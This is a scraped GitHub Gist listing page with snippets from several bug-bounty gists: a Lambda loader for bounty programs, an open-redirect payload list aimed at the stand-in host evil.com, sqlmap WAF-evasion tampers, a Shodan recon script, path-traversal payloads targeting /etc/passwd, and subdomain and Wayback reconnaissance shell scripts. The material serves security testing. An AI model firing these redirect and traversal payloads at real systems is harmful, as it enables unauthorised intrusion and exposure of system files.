Skip to content

Instantly share code, notes, and snippets.

View Diaa-Hassan's full-sized avatar
🧙

Diaa Hassan Diaa-Hassan

🧙
View GitHub Profile
@brevityinmotion
brevityinmotion / brevity-programs-bulk.py
Created July 28, 2021 03:22
Bulk load bug bounty programs
import json, boto3
import ast
import urllib.request
import pandas as pd
import numpy as np
import brevityscope.scope
import brevityprogram.programs
def lambda_handler(event, context):
@KathanP19
KathanP19 / Open-Redirect-Payloads.txt
Last active April 15, 2024 18:41
Open Redirect Payloads from zseano methodology.
\/evil.com
%5c%2fevil.com
\/\/evil.com
%5c%2f%5c%2fevil.com
\\evil.com
%5c%5cevil.com
//evil.com
%2f%2fevil.com
//[email protected]
/\/evil.com
@duraki
duraki / sqlmap_which_tamper_to_use.txt
Created May 8, 2021 09:35
Best sqlmap tampers to use depending on the DBMS
## MySQL
space2randomblank
unionalltounion
unmagicquotes
versionedkeywords
versionedmorekeywords
xforwardedforbetween
bluecoat
charencode
@Zeyad-Azima
Zeyad-Azima / shodrecon.py
Created May 2, 2021 22:46
A simple shodan recon script for bug bounty
#By: Zeyad Azima (https://github.com/Zeyad-Azima)
# install:
## pip3 install requests
## pip3 install shodan
# Run: python3 shodrecon.py target
import shodan, requests, json, threading, sys
# Your Api key here
API_KEY = ""
@sindresorhus
sindresorhus / esm-package.md
Last active July 14, 2025 05:53
Pure ESM package

Pure ESM package

The package that linked you here is now pure ESM. It cannot be require()'d from CommonJS.

This means you have the following choices:

  1. Use ESM yourself. (preferred)
    Use import foo from 'foo' instead of const foo = require('foo') to import the package. You also need to put "type": "module" in your package.json and more. Follow the below guide.
  2. If the package is used in an async context, you could use await import(…) from CommonJS instead of require(…).
  3. Stay on the existing version of the package until you can move to ESM.
@0x240x23elu
0x240x23elu / traversals-8-deep-exotic-encoding.txt
Created February 23, 2021 05:20
traversals-8-deep-exotic-encoding.txt
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/..%2fetc/passwd
/..%2f..%2fetc/passwd
@chr0ll0x0
chr0ll0x0 / auto-subdomains.sh
Last active July 8, 2022 21:57
for subdomains
#!/bin/bash
#please install this tool first
#install jq
#Assetfinder - https://github.com/tomnomnom/assetfinder
#Subfinder - https://github.com/projectdiscovery/subfinder
#Amass - https://github.com/OWASP/Amass
#Findomain https://github.com/Findomain/Findomain
#Anew https://github.com/tomnomnom/anew
#crobat https://github.com/cgboal/sonarsearch/crobat
#!/bin/sh
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee bugcrowd-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'| grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee federacy-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv' | grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee h1-wildcards
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv' grep '^*' | awk '{print $1}' | sed 's/^\*\.//g'| tee intigriti-wildcards
#!/bin/sh
echo $1 | waybackurls > wayback-results
cat wayback-results | grep "\.conf" | tee $1-poorGF
cat wayback-results | grep "\.xml" | tee -a $1-poorGF
cat wayback-results | grep "\.db" | tee -a $1-poorGF
cat wayback-results | grep "\.log" | tee -a $1-poorGF
cat wayback-results | grep "config" | tee -a $1-poorGF
cat wayback-results | grep "env" | tee -a $1-poorGF
#!/usr/bin/env bash
echo "Enter name of the program: "
read PROGNAME
echo "enter name of the seed domain for amass "
read SEED
BOUNTYD=$HOME/01/bounty
PLATFORM=h1
# create project directory
# ascr auto screenshot ,mscr manual screenshot